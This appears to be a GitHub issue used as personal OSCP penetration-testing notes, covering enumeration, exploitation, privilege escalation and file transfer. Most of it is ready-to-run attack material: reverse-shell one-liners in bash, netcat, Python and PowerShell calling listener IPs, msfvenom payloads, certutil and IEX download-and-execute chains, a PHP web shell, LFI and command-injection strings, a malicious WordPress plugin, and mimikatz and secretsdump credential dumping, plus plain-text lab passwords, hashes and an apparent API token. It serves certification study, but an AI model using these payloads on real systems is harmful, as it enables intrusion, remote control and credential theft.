Open WDavid404 opened 9 months ago
sudo env "PATH=$PATH" autorecon 192.168.195.248
(meanwhile, try “ rustscan -a <IP> -- -sV -A
”)
see nmap port report: find
- os info
- host info
- domain info:
e.g
in http-title
- find service version info
-->
SNMP (udp 161)
snmpwalk -v 2c -c public 192.168.190.149 NET-SNMP-EXTEND-MIB::nsExtendOutputFull
snmpbulkwalk -c public -v2c 192.168.182.149 . --》 里面包含的信息比autorecon的多。。比如password
ftp via anonymouse
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2>&1|nc 192.168.45.220 1234 > /tmp/f
“web-control” file: nc -e /bin/sh 192.168.45.220 1235
smb
--> find share folders or user list enum4linux -a target_ip
smbmap -H <URL or IP> //to show share dir list as anonymous user (e..g smbmap -u jsmith -p password1 -d workgroup -H 192.168.0.1)
smbclient //active.htb/Replication (access a share dir as anonymous user)
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2>&1|nc 192.168.45.220 1234 > /tmp/f
web-control: nc -e /bin/sh 192.168.45.220 1235
53/port dns:
dig axfr @<DNS_IP>
google for exploit
access web service via browser,
wpscan --url http://xxxxxx -e u,t,p
check /robots.txt
sometimes, we need to bypass user-agent restirction (e.g. only search engine can access robots.txt):
curl --user-agent “Google/1.0” <IP>:<port>/robots.txt
feroxbuster/gobuster/ffuf for http service
subdomain brute force:
ffuf -c -w /usr/share/dnsrecon/subdomains-top1mil-5000.txt -u http://devvortex.htb/ -H "Host: FUZZ.devvortex.htb" -fw 5338 | grep --color=auto 200
-→ after finding, eidt /etc/hosts file and added this subdomain on the same line
search for zip, backup files: feroxbuster -u https://oscp.example.com:8443 -k -C 404 -x zip -B
or, try hydra
hydra -l gaara -P /usr/share/wordlists/rockyou.txt ssh://192.168.163.142:22
- exiftool -a -u PDF_NAME.pdf
- exiftool xxxx.jpg
- steghide extract -sf filename.jpg
hydra -L user -P /usr/share/wordlists/rockyou.txt ssh://$IP -V
hydra -L user -P user ssh://$IP -V -u (check if user and password are same)
hydra -L user -P user ssh://$IP -V
or when you don't have user info
nmap -p 22 --script ssh-brute.nse <target> -vvv
Try
impacket-GetUserSPNs -request -dc-ip <domain url or ip> <domain host name> (as anonymouse user request)
e.g. GetNPUsers.py htb.local/ -dc-ip forest.htb -request
impacket-GetUserSPNs -request -dc-ip 172.16.214.10 MEDTECH.com/leon (PWD: rabbit:))
--> get administartor hash info
john --wordlist=/usr/share/wordlists/rockyou.txt admin.txt to crack hash
impacket-psexec <domain>/administrator:"<password>"@192.168.246.189
impacket-psexec -hashes 000000000000000000000000000000000:8d7a47a6f9f66b97b1bae4178747494 joe@172.16.206.11
netexec <target(s)> -u username -p password --continue-on-success
netexec <target(s)> -u username -p password --local-auth
netexec <target(s)> -u ~/file_containing_usernames -p ~/file_containing_passwords
# -just-dc: Extract only NTDS.DIT (NTLM hashes and kerberos keys).
impacket-secretsdump -just-dc example.local/username:password@<target-ip>
# -just-dc-ntlm: Extract only NTDS.DIT data (NTLM hashes only).
impacket-secretsdump -just-dc-ntlm example.local/username:password@<target-ip>
one example: https://daemonexala.medium.com/hack-the-box-forest-without-metasploit-tjnulls-list-for-oscp-3260e035a4bd
RCE exploit
upload file to FTP, web page ---> some case: we cannot upload aspx file,instead, we can upload a web.config file web.config file could execute code. Let’s craft a web.config file with the sample code as below, and put the code to download and execute a powershell script that we will be hosting on our own http server.
FLI
try:
../../../../../../../../../etc/passwd
../../../../var/log/apache2/access.log
e.g.
192.168.224.80/console/file.php?cmd=whoami
(
other cases:
$IP:8593/index.php?book=../../../var/log/apache2/access.log&cmd=id
$IP:8593/index.php?book=../../../var/log/apache2/access.log&&cmd=id
$IP:8593/index.php?book=../../../var/log/apache2/access.log?cmd=id
$IP:8593/index.php?book=../../../var/log/apache2/access.log;cmd=id
)
http://192.168.224.80/console/file.php?file=/etc/passwd
http://192.168.167.80/console/file.php?file=/var/log/auth.log&cmd=id
curl http://192.168.167.80/console/file.php?file=/var/log/auth.log&cmd=python3%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%22192.168.45.204%22,4444));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import%20pty;%20pty.spawn(%22sh%22)%27
e.g1. if we have file.php URL, we can try:
ffuf -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-big.txt -u http://192.168.210.80/console/file.php?FUZZ= -t 100 -fs 0
OR
ffuf -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-big.txt -u http://192.168.210.80/console/file.php?FUZZ -t 100 -fs 0
OR
ffuf -w /usr/share/wordlists/directory-list-lowercase-2.3-medium.txt -t 100 -u http://$IP/secret/evil.php?FUZZ=/etc/passwd -fs 0
OR
ffuf -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-big.txt -u http://192.168.210.80/console/file.php?FUZZ=../../../../../../../../../../etc/passwd -t 100 -fs 0
php://filter/convert.base64-encode/resource=../../../../../../../../etc/passwd
http://localhost/include.php?page=php://filter/convert.base64-encode/resource=secret.inc
http://localhost/include.php?page=php://filter/read=convert.base64-encode/resource=secret.inc
http://localhost/include.php?page=php://filter/resource=/etc/passwd
- cron job on web page
- SQL injection
- log poisoning
nc -nv ip 22 (22 port--> SSH log poisoning)
anyword/<?php system($_GET['cmd']); ?>
3306/port mysql
hydra -l root -P /urs/share/wordlists/rockyou.txt mysql://192.168.226.118
=============================
# PE phase
## both for linux and windows
check wp-config.php file (/var/www/html)
e.g. `cat wp-config.php | grep DB`
## PE for Active Directory
mimikatz tool
.\mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit" .\mimikatz.exe "token::elevate" "lsadump::sam" "exit"
/// dcsync
mimikatz # lsadump::dcsync /user:corp\Administrator
mimikatz # lsadump::dcsync /user:corp\
check history
`cat C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
`
credential info in registry, etc
(Get-ItemProperty -Path "HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name DefaultUserName -ErrorAction SilentlyContinue).DefaultUserName
(Get-ItemProperty -Path "HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name DefaultPassword -ErrorAction SilentlyContinue).DefaultPassword
we can also search SAM, SYSTEM file under windows/system32 folder
then, crack them -→ `impacket-secretsdump -sam SAM -system SYSTEM LOCAL`
check whether credetial info are avaible for lateral movement:
`netexec winrm 10.10.167.140-142 -u 'tom_admin' -H '4979d69d4ca66955c075c41cf45f24dc'
`
login via winrm
`evil-winrm -H 4979d69d4ca66955c075c41cf45f24dc -u tom_admin -i 10.10.167.140
`
login to MSSQL server:
`impacket-mssqlclient oscp.exam/sql_svc:Dolphin1@10.10.209.148 -windows-auth `
## PE for linux standalone
auto enum tool
`linpeas -a
`
manual enum check
sudo -l (check what commands current user can run with sudo privilege)
cat /etc/passwd | grep bash ()
cat /etc/crontab (cronjobs running)
ls -al /etc/cron
cat .bash_history (passwords saved in history)
env (passwords saved in environment variable)
uname -ar (kernel exploits)
cat /etc/-release (kernel exploits)
ss -tulnp (check for any potential services running) ---------> curl 127.0.0.1:
getcap -r / 2>/dev/null (capabilities)
find / -perm -u=s -type f 2>/dev/null (SUID)
find / -perm -g=s -type f 2>/dev/null (SGID)
sudo --version (public exploits)
id (check for docker and lxd group)
ls -la /etc/passwd (writable /etc/passwd)
ls -la /etc/shadow (writeable /etc/shadow)
ps aux | grep -i "root" --color=auto
find / -name cronlog 2>/dev/null ----- check cron job log info
find / -writable 2>/dev/null
find / -perm -o+w -type f 2>/dev/null | grep /proc -v --- checck writable files under /proc dir
cd /home grep -rnH "password" .
cd /var/www/ grep -rnH "password" .
find . -type f -exec ls -lsha {} + | grep -E -i '.secret|secret|token|key|api|password|user
find .dat file contains SHA string: find /opt/ofbiz/runtime/data/derby/ofbiz/seg0 -type f -name “*.dat” -exec grep “SHA” {} \;
check if credentials stored in .bash_history find /home -name .bash_history -exec cat {} \;
recursively grep all directories and subdirectories: grep -rnH "password" .
cat C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
try su to switch user to root: `su root`, `su`
try pspy64
## PE for windows standalone
whoami /priv
winpeas
--->
find backup (.zip) file
credential info in registry, etc
(Get-ItemProperty -Path "HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name DefaultUserName -ErrorAction SilentlyContinue).DefaultUserName
(Get-ItemProperty -Path "HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name DefaultPassword -ErrorAction SilentlyContinue).DefaultPassword
interesting service
we can also search SAM, SYSTEM file under windows/system32 folder
then, crack them on kali -→ ` impacket-secretsdump -sam SAM -system SYSTEM LOCAL`
https://github.com/WDavid404/Note_tryhackme/issues/2
nmap -p- -T5 <ip> -v #-p- to scan ports from 1 through 65535
# then,
nmap -p 22,25,80, A <ip> -v
sudo nmap -sC -sV -oN mailsrv1/nmap 192.168.50.242
sudo nmap -p- -sV -T5 192.168.202.52 //T5有时候扫描不出东西,此时改为T4等重新尝试
nmap -p 22,80,443 -A
nc -vz 192.168.135.19 1-65535 2>&1 | grep succeeded nc -vz 192.168.135.19 22 2>&1 | grep succeeded
sudo proxychains -q nmap -sT -oN nmap_servers -Pn -p 21,80,443 172.16.6.240 172.16.6.241 172.16.6.254
wget https://github.com/RustScan/RustScan/releases/download/2.0.1/rustscan_2.0.1_amd64.deb dpkg -i rustscan_2.0.1_amd64.deb
rustscan -a 10.10.216.174 --ulimit 5000 -- -sV -A -oN rustscan.txt
$python -m SimpleHTTPServer 9000 $python3 -m http.server 9000
python -c ‘import pty; pty.spawn(“/bin/bash”)’ python3 -c 'import pty;pty.spawn("/bin/bash")' ---》 为了执行/bin/bash命令
//在tty之后执行下面命令: export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH export TERM=xterm256-color export SHELL=bash alias ll=‘clear; ls -lsaht —color=auto’ ctrl + z stty raw -echo; fg; reset //此时发现即使我们按下ctrl+c,也不会从当前的session里断开 stty rows 200 columns 200
讲解:
This shell sucked so I ran the following command to upgrade it to a more stable one:
/usr/bin/script -qc /bin/bash /dev/null
looking into PATH environment variable , we can see that the path is set to current user home directory, due to which it’s not able to find the binary of the command.
we can do
export PATH=$PATH:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
https://www.revshells.com/ https://highon.coffee/blog/reverse-shell-cheat-sheet/
Linux shell
#! /bin/bash
bash -i >& /dev/tcp/192.168.121.100/4444 0>&1
如果是remote环境(特别是执行injection的时候)下则可以尝试执行
bash -c ’bash -i >& /dev/tcp/192.168.121.100/4444 0>&1‘
或者尝试
bash ’bash -i >& /dev/tcp/192.168.121.100/4444 0>&1‘
另一种思路: try saving your rev shell command into a file, then use the query to download it using wget and just run it. Use port 443 for rev shell and 80 for local http server.
on Windows PC
c:\tools\nc64.exe -e cmd.exe 10.10.187.189 4444
certutil -urlcache -f http://192.168.45.211/nc64.exe c:/windows/temp/nc64.exe;
c:/windows/temp/nc64.exe -e cmd.exe 192.168.45.211 4444
msfvenom
msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=4445 -f exe-service -o rev-svc.exe //是service
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.8.50 LPORT=4444 -f exe -o rev.exe //是exe
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.8.232.37 LPORT=443 -f hta-psh -o thm.hta
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.50.4 LPORT=443 EXITFUNC=thread -f c –e x86/shikata_ga_nai -b "\x00\x0a\x0d\x25\x26\x2b\x3d"
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.50.4 LPORT=443 -f python -b "\x00\x0a" -v shellcode
Note:-v指定输出的变量名(默认时是buf)
因为使用的是msfvenom with meterpreter,所以接收端需要使用msfconsole (而不是nc)
msfconsole -x "use exploit/multi/handler;set payload windows/meterpreter/reverse_tcp;set LHOST <KALI_IP>;set LPORT <PORT>;run;"
接到reverse shell后,输入shell
msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.184 LPORT=5555 -f dll -o EnterpriseServiceOptional.dll
教训: 没有-f的话即使生成了dll也无法实际动作
On the target machine
nc -e /bin/sh 10.0.0.1 4242
nc -e /bin/bash 10.0.0.1 4242
nc -c bash 10.0.0.1 4242
C:\Windows\Temp\nc.exe -e cmd.exe 192.168.118.4 4446
//linux
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.36 3333 >/tmp/f
//linux + python3
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("attackerip",attackerport));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("bash")'
On NC receiver side
nc -lvnp 4444
应用场景: RCE的payload
(比如
python3 49488.py -u mark@relia.com -p OathDeeplyReprieve91 -i 'http://web02.relia.com:14080' -c powershell.exe -a '-e JABjAGwAaQBlAG4A。。。。‘
)
one-liner command payload
$client = New-Object System.Net.Sockets.TCPClient("192.168.119.3",4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
encode时注意:对于对象是Windows的时候选择CRLF
64base Encode online: https://www.base64encode.org/
powershell -e base64_payload
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('192.168.45.243',4443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
Non-stage: msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.243 LPORT=443 -f exe -o met.exe msfvenom -p linux/x64/shell_reverse_tcp LHOST=IP LPORT=PORT -f elf > shell.elf 对应 nc -vlp 443
Stage:
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.45.223 LPORT=4445 -f exe -o met.exe
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f elf > reverse.elf
kali@kali:~/beyond$ sudo msfconsole -q
msf6 > use multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST 192.168.45.204
LHOST => 192.168.45.243
msf6 exploit(multi/handler) > set LPORT 443
LPORT => 443
msf6 exploit(multi/handler) > set ExitOnSession false -->It specifies that the listener stays active for new sessions without the need to restart it for every incoming session.
ExitOnSession => false
msf6 exploit(multi/handler) > run -j
[*] Exploit running as background job 0.
for linux
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.45.180/4445 0>&1'");?>
other reference: http://pentestmonkey.net/tools/php-reverse-shell
xfreerdp /u:offsec /p:lab /w:1200 /h:800 +fonts +clipboard /v:192.168.223.250 /drive:.,kali-share /cert-ignore
xfreerdp /d:za.tryhackme.com /u:'user.name' /p:'qwertqwertqwert123!!' /v:192.168.186.62 /w:800 /h:700 /drive:.,kali-share +clipboard
// xfreerdpコマンド例(フルスクリーン)
xfreerdp /u:tsutomu-nakamura /p:qwertqwertqwert123\!\! /f +fonts +clipboard /v:192.168.1.103:3389 /drive:.,kali-share
// xfreerdpコマンド例(解像度指定
xfreerdp /u:tsutomu-nakamura /p:password /w:800 /h:500 +fonts +clipboard /v:192.168.1.103:3389 /drive:.,kali-share
//with domain
kali@kali:~$ xfreerdp /u:stephanie /d:corp.com /v:192.168.50.75 /w:800 /h:500 /drive:.,kali-share
//using hash instead of password
xfreerdp /v:192.168.0.1 /u:username /pth:
To exit from full-screen: CTRL-ALT-ENTER
evil-winrm -i MACHINE_IP -u thmuser1 -p Password321
evil-winrm -i 192.168.50.220 -u daveadmin -p "qwertqwertqwert123\!\!" -P 5985
Download file
*Evil-WinRM* PS C:\Users\hacker\Documents> download <file path in the target host > <kali local path>
*Evil-WinRM* PS C:\users\wario\Desktop> download local.txt .
--》 下载local.txt到kali的当前目录(即启动Evil-winRM时的目录)
Upload file:
*Evil-WinRM* PS C:\Users\hacker\Documents> upload <file path in kali> <the target host's path>
*Evil-WinRM* PS C:\users\wario\Desktop> upload test.txt .
--> 从kali上启动Evil-winRM时的目录里上传test.txt文件到target机器上
https://eng-entrance.com/linux-command-ftp
Login:
Upload: ftp > put ファイル名 Download: get ファイル名 多个文件Upload: mput ファイル名 多个文件Donwload: mgetファイル名 (mget *.jpg)--> 注:隐藏文件(比如 .@admins)需要另外使用get单独下载 mkdir:ディレクトリを作成する delete:ファイルを削除する chmod:ファイルのアクセス権の変更
wget -r ftp://user:pass@server.com/
## anonymous case
wget -r ftp://anonymous:@192.168.218.157/backup
ls -al /usr/share/nmap/scripts|grep ftp
--> list all script for ftp
sudo nmap -sS -p21 --script ftp-brute 192.168.172.144
sudo nmap -sS -vv -p25 192.168.216.1-200 -oG nmap_out2
grep open nmap_out2|cut -d" " -f2 > list_smb
for ip in $(cat list.txt); do host $ip.megacorpone.com; done
for ip in $(seq 1 254); do echo 192.168.50.$ip; done > ips
利用nc扫描subnet里哪个ip开放了445 port
for i in $(seq 1 254); do nc -zv -w 1 172.16.50.$i 445; done
The -z flag to check for a listening port without sending data, -v for verbosity, and -w set to 1 to ensure a lower time-out threshold.
(dir 2>&1 *`|echo CMD);&<# rem #>echo PowerShell
在curl request里使用其URL encode后的内容,如下:
kali@kali:~$ curl -X POST --data 'Archive=git%3B(dir%202%3E%261%20*%60%7Cecho%20CMD)%3B%26%3C%23%20rem%20%23%3Eecho%20PowerShell' http://192.168.50.189:8000/archive
kali@kali:~$ cp /usr/share/powershell-empire/empire/server/data/module_source/management/powercat.ps1 .
kali@kali:~$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
使用下面命令的URL encode内容
IEX (New-Object System.Net.Webclient).DownloadString("http://192.168.119.3/powercat.ps1");powercat -c 192.168.119.3 -p 4444 -e powershell
于是最终的request为:
kali@kali:~$ curl -X POST --data 'Archive=git%3BIEX%20(New-Object%20System.Net.Webclient).DownloadString(%22http%3A%2F%2F192.168.119.3%2Fpowercat.ps1%22)%3Bpowercat%20-c%20192.168.119.3%20-p%204444%20-e%20powershell' http://192.168.50.189:8000/archive
https://discord.com/channels/780824470113615893/1148907181480104028
在Kali机器上:
安装: apt install python3-impacket
使用: impacket-smbserver shareName sharePath -smb2support
(比如:impacket-smbserver smb_wei . -smb2support
)
在Windows PC上
连接: C:\>net use \\192.168.45.159\smb_wei
copy文件:
C:\WINDOWS\Temp>copy .\Desktop\ticket.doc \\192.168.45.159\smb_wei\ticket.doc
1 file(s) copied.
连接smb上
smbclient -U "DOMAIN\user" //server/example
e.g.
smbclient //192.168.223.248/Users --user=relia.com/offsec%lab
smbclient //192.168.194.10/offsec
--》没有username和password的情况,直接敲回车
Using xfreerdp: On Kali: xfreerdp /cert-ignore /compression /auto-reconnect /u: offsec /p:lab /v:192.168.212.250 /w:1600 /h:800 /drive:test,/home/kali/Documents/pen- 200
On windows:
copy mimikatz.log \\tsclient\test\mimikatz.log
--》 “tsclient”存在于Network目录里
https://github.com/WDavid404/OSCP/issues/12#issuecomment-1875504860
On your machine
nc -nlvp 4433 > <filename>
On Target
nc -nv 192.168.45.xx 4433 < <filename>
[On Kali] scp stuart@192.168.x.144:/opt/backup/sitebackup3.zip .
python3 -m http.server 80
【Windows】PS C:\Users\dave> iwr -uri http://192.168.45.244/winPEASx64.exe -Outfile winPEAS.exe
curl -o winPEAS.exe http://192.168.194.10/winPEAS.exe
smbclient //192.168.50.195/share -c 'put config.Library-ms'
然后输入kali上的密码
Windows上执行powershell wget
powershell wget -Uri http://192.168.118.4/nc.exe -OutFile C:\Windows\Temp\nc.exe
Windows PC上利用certutil工具(在SQI injection的练习时用到)
certutil -urlcache -f http://192.168.45.211/nc64.exe c:/windows/temp/nc64.exe;
c:/windows/temp/nc64.exe -e cmd.exe 192.168.45.211 4444
https://www.geeksforgeeks.org/smb-enumeration/
smbclient -L <target IP>
kali@kali:~$ smbclient -p 4455 -L //192.168.50.63/ -U hr_admin --password=Welcome1234
kali@kali:~$ smbclient -p 4455 //192.168.50.63/scripts -U hr_admin --password=Welcome1234
enum4linux -U <target IP>
smbmap -u jsmith -p password1 -d workgroup -H 192.168.0.1
crackmapexec smb 192.168.50.242 -u john -p "dqsTwTpZPn#nL" --shares
==》 to list the SMB shares and their permissions on MAILSRV1(192.168.50.242)
//访问TMP目录 smbclient //172.16.208.11/TEMP --user=MEDTECH.COM/joe%Flowers1
//上传mimikatz文件到TMP目录 smbclient //172.16.208.11/TEMP -c 'put mimikatz.exe' --user=MEDTECH.COM/joe%Flowers1
//直接把transfer目录里的文件下载本地 smbclient '//192.168.213.248/transfer' -N -c 'prompt OFF;recurse ON;mget ' smbclient '//192.168.213.248/transfer' -N -c 'prompt OFF;recurse ON;mget '
usage:
feroxbuster -u http://192.168.236.249 -x html -x php -x aspx feroxbuster -u http://192.168.172.144 -w /usr/share/wordlists/dirb/common.txt -t 20 -x zip,html,php
https://github.com/ffuf/ffuf Installation: git clone https://github.com/ffuf/ffuf ; cd ffuf ; go get ; go build
Usage:
ffuf -w /path/to/wordlist -u https://target/FUZZ
//可以组合搜索关键词W1和W2
kali@kali$ ffuf -u https://W2/W1 -w ./wordlist.txt:W1,./domains.txt:W2
//recursion
ffuf -u http://example.com/FUZZ -w /path/to/wordlist -recursion
//-e to specify extensions
ffuf -e .php,.zip,.bak -u http://example.com/FUZZ -w /path/to/wordlist
kali@kali$ ffuf -w /path/to/paramnames.txt -u https://target/script.php?FUZZ=test_value -fs 4242
kali@kali$ ffuf -w /path/to/vhost/wordlist -u https://target -H "Host: FUZZ" -fs 4242
Reference:
https://jpn.nec.com/cybersecurity/blog/210604/index.html
实例:
ffuf -w /usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-medium.txt -t 100 -u http://$IP/FUZZ
ffuf -c -w /usr/share/dnsrecon/subdomains-top1mil-5000.txt -u http://devvortex.htb/ -H "Host: FUZZ.devvortex.htb" -fw 5338 | grep --color=auto 200
Note: when found a sub-domain,don't forget to add sub-domain info to /etc/hosts
Gobuster supports different enumeration modes, including fuzzing and dns。
e.g.
kali@kali:~/beyond$ gobuster dir -u http://192.168.50.242 -w /usr/share/wordlists/dirb/common.txt -o mailsrv1/gobuster -x txt,pdf,config
Use dir mode, which enumerates files and directories.
gobuster dir -u 192.168.50.20 -w /usr/share/wordlists/dirb/common.txt -t 5
Gobuster to search pdf files on a target web site
gobuster dir -u 192.168.194.197 -w /usr/share/wordlists/dirb/common.txt -t 5 -x .pdf
HP: https://github.com/OJ/gobuster
space: %20 or a plus (+) sign . : %2E / : %2F
注:URLencode转换时用下面的网页好:https://meyerweb.com/eric/tools/dencoder/
https://whitemarkn.com/learning-ethical-hacker/wpscan/
wpscan --url http://xxxxxx -e u,t,p
wpscan --url www.yahoo.co.jp
wpscan --url 192.168.194.16
wpscan --url http(s)://www.yoursiteurl.com --enumerate ap # enumerate all plugins
wpscan --url http(s)://www.yoursiteurl.com --enumerate vp # only display vulnerable plugins
wpscan --url http(s)://www.yoursiteurl.com -e u # enumerate users
wpscan --url http://alvida-eatery.org --passwords /usr/share/wordlists/rockyou.txt --usernames admin
wpscan --url http://alvida-eatery.org -e u, ap --api-token=vtYOkb3ZEKnydV二VrqFxsZ1teXsWYkiveX巴xWGCgYMo #这样才能报告出更多的问题
wpscan --url http://192.168.50.244 --enumerate p --plugins-detection aggressive -o websrv1/wpscan
==> 搜索plugin和theme上的脆弱性
https://sevenlayers.com/index.php/179-wordpress-plugin-reverse-shell
<?php
/**
exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.86.xx/443 0>&1'"); ?>
2. zip这个文件: `zip reversh-plugin.zip ./reversh-plugin.php`
3. upload到wordpress的plugin里,然后active它 (同时在attack machine上利用nc接收reverse shell的请求)
![image](https://github.com/WDavid404/OSCP/assets/137129330/2aaa4b85-7a03-42ca-85de-89aa7f263c00)
recursively grep all directories and subdirectories:
grep -rnH "password" .
-rnH: These are options or flags used with the grep command:
-r (or --recursive): Searches recursively through directories and their subdirectories for the specified pattern.
-n (or --line-number): Displays the line numbers along with the lines that contain the matched pattern.
-H (or --with-filename): Displays the file name where the match is found along with the matching line.
find / -type f -name flag* 2>/dev/null
case: narrow down which .dat files had “SHA” string in them for a hash:
-->
find /opt/ofbiz/runtime/data/derby/ofbiz/seg0 -type f -name “*.dat” -exec grep “SHA” {} \;
Get-ChildItem -Path C:\Users -Include *log*,*ini,*.txt,*.pdf,*.xls,*.xlsx,*.doc,*.docx -File -Recurse -ErrorAction SilentlyContinue
Get-ChildItem -Path C:\ -Include *.kdbx -File -Recurse -ErrorAction SilentlyContinue
发送邮件
sudo swaks -t dave.wizard@supermagicorg.com --from test@supermagicorg.com -ap --attach config.Library-ms --server 192.168.208.199 --body body.txt --header "Subject: Problems" --suppress-data
update exploitdb package: sudo apt update && sudo apt install exploitdb
The above command updates the local copy of the Exploit Database archive under /usr/share/exploitdb/
.
searchsploit remote smb microsoft windows
On Attack machine
$ gcc ofs.c -o ofs # target machine is Linux OS
$ python3 -m http.server 9000
On target machine
$ cd /tmp/
$ wget <IP>:9000/ofs
$ chmod +x ofs
$ ./ofs
this missing symbol usualy means ur kali glibc is newer than the target machine.
if u can compile it on target machine it will usually works,
otherwise u can try compile it with static libarary, i.e, gcc -static your_program.c -o your_program
x86_64-w64-mingw32-gcc adduser.c -o adduser.exe
kali@kali:~/passwordattacks$ chmod 600 id_rsa
kali@kali:~/passwordattacks$ ssh -i id_rsa -p 2222 dave@192.168.50.201
sudo ssh -i tom_key -oHostKeyAlgorithms=+ssh-dss tom@192.168.227.107
//如果ssh login后遇到error:rbash: cd: restricted,可以使用-t "bash --noprofile"重新ssh login
sudo ssh -i tom_key -oHostKeyAlgorithms=+ssh-dss tom@192.168.227.107 -t "bash --noprofile"
/home/<user>/.ssh/id_rsa
利用dictonary travesal时可以直接去查看上面的文件内容(特别是有的时候 无法远程使用ls命令等的时候)
有了某个user的private key,我们就可以以他的名义来login SSH server
kali@kali:~/beyond/websrv1$ chmod 600 id_rsa
kali@kali:~/beyond/websrv1$ ssh -i id_rsa daniela@192.168.50.244
注意:如果被要求“Enter passphrase for key 'id_rsa'”,可以用ssh2john工具破解passphrase
ssh2john id_rsa > ssh.hash
kali@kali:~/beyond/websrv1$ john --wordlist=/usr/share/wordlists/rockyou.txt ssh.hash
https://github.com/WDavid404/OSCP/issues/16#issuecomment-1891230625
A:可以清空 ~/.ssh/known_hosts文件内容
更好的是: ssh-keygen -R example.com
但是有的时候不起作用 (https://qiita.com/hnw/items/0eeee62ce403b8d6a23c)
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ WARNING: REMOTE HOST IDENTIFICATION HAS CHANGED! @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
IT IS POSSIBLE THAT SOMEONE IS DOING SOMETHING NASTY!
Someone could be eavesdropping on you right now (man-in-the-middle attack)!
It is also possible that a host key has just been changed.
The fingerprint for the RSA key sent by the remote host is
**:**:**:**:**:**:**:**:**:**:**:**:**:**:**:**.
Please contact your system administrator.
Add correct host key in /Users/hnw/.ssh/known_hosts to get rid of this message.
Offending RSA key in /Users/hnw/.ssh/known_hosts:133
RSA host key for example.com has changed and you have requested strict checking.
Host key verification failed.
Kali:
$ ssh-keygen
$ ls
`id_rsa id_rsa.pub`
$ cat id_rsa.pub
`ssh-rsa AAAAB3NzaC1 ---SNIP--- rHM= kali@kali`
Target:
`dev@oscp:~$ mkdir /home/dev/.ssh`
`dev@oscp:~$ echo "ssh-rsa AAAAB3NzaC1 ---SNIP--- rHM= kali@kali" > /home/dev/.ssh/authorized_keys`
dev@oscp:~$ cat /home/dev/.ssh/authorized_keys
`ssh-rsa AAAAB3NzaC1 ---SNIP--- rHM= kali@kali`
Back on kali:
`ssh -i id_rsa dev@192.168.XXX.150`
Then,you can setup the forward with ssh as follows
ssh -i id_rsa dev@192.168.xxx.150 -L 8000:127.0.0.1:8000
At this point you should have the access to port 8000, locally on kali at 127.0.0.1:8000
确认其是否work: nmap -p8000 127.0.0.1
注意,用web browser或curl访问127.0.0.1:8000不一定会得到结果,因为server端后台未必是在运行web service。
https://github.com/WDavid404/Note_tryhackme/issues/6 https://github.com/WDavid404/OSCP/issues/16
https://gchq.github.io/CyberChef/
